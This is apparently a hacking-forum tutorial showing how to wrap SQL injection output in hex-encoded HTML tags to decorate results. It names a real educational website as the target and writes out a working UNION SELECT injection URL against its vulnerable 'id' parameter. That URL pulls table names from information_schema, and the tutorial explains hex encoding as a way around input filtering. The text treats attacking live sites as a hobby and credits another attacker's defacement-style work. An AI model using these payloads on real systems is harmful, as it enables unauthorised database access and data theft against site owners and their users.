Salam Pak leets ..
In this tutorial i will show you how to add HTML tags and designs in your SQL Injection queries..
-----> By using HTML tags in our SQLi query, we can arrange the output in a proper way.
-----> Sometimes the result of our query appears in the source of the webpage or in the title or sometimes in the URL. In that case we add HTML tags to make it more visible on the webpage.
-----> I don't know about you guys but as you can see i like Colors and decoration .. ALOT ..
First of all, i assume you guys have sound knowledge of SQL injection and Basic HTML.
For this Tutorial .. The site I'm going to inject is :
Here is the vulnerable link where parameter 'id' is vulnerable to a very simple SQLi.
So, lets start with some very basic injection and i can quickly see that there are 9 Columns here.
And I will inject in 4th column. so Lets get the database name in 4th column.
Now, look at the database name. Even though it is visible ( not in the source code but on the proper page ) but font size is very small .. Don't know about you .. but i don't like it.
Now, let me show you the wonders of HTML tags.
We can always add HTML in our SQLi query. Sometimes we can write it directly enclosed in single quotes like :
concat ('<opening_tags>', QUERY , '<closing_tags>')
But most of the times this syntax is not allowed and we have to convert our HTML tags in HEX . like ..
concat(0xHEX_value_of_opening_tag , QUERY , 0xHEX_value_of_closing_tag)
Notice these 0x here .. This means that what ever is written after this .. Decode it from HEX before executing.
Following are the basic usage of these tags. You can use your creativity and endless imagination.
Lets start with an HTML tag called <font>.
Usage : <font size="8" color="red"> MakMan </font>
I'm going to use this tag in our query but in this website it doesn't allow to use HTML tags directly so we have to convert to HEX first. Just follow the syntax.
Now my format should be:
To convert in HEX, you can use many online tools. Just google :String to HEX converter
After converting my opening and closing tags in this case.
Opening_tag = <font size="8" color="red"> ---- HEX ---> 3c666f6e742073697a653d22382220636f6c6f723d22726564223e
Closing_tag = </font> ---- HEX ---> 3c2f666f6e743e
Putting these HEX values in my format. My query will become:
Look at the Result now .. Sweet
Mostly people write their names in SQL Injection with their query. Lets try that.
Creativity has no boundaries.
My HTML Syntax before converting to HEX (Just to show you guys what I'm doing, It will not work You have to Convert it to HEX):
hxxp://dbhspgoa.edu.in/Article.php?id=92+and+0+UNION+SELECT+1,2,3,group_concat(0x<br><font face='calibri' size="5" color="green">MakMan</font><font face='Impact' size="4" color="red">,table_name,0x</font>,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()--
My HTML Syntax after converting it to HEX:
Check the result. Now just Imagine what else you can do with it.
It took me an hour to write this thread but i want to share the credits of this tutorial with -ajkaro , the best SQL injector i have ever known. Let me show you guys some of his art work with manual SQLi.
NOTE: If you copy paste these links from here into your browser tab, make sure to paste it in notepad first and delete these bugs ..
these Bugs Appear because when we copy paste directly from Mybb thread page, we also copy some unicode characters like this zero width space &'#8203; which when comes in a query doesn't show the results properly ..
and lastly .. shouts to some MADS out there ..
u guys are and always will be my favorite .. My respects ..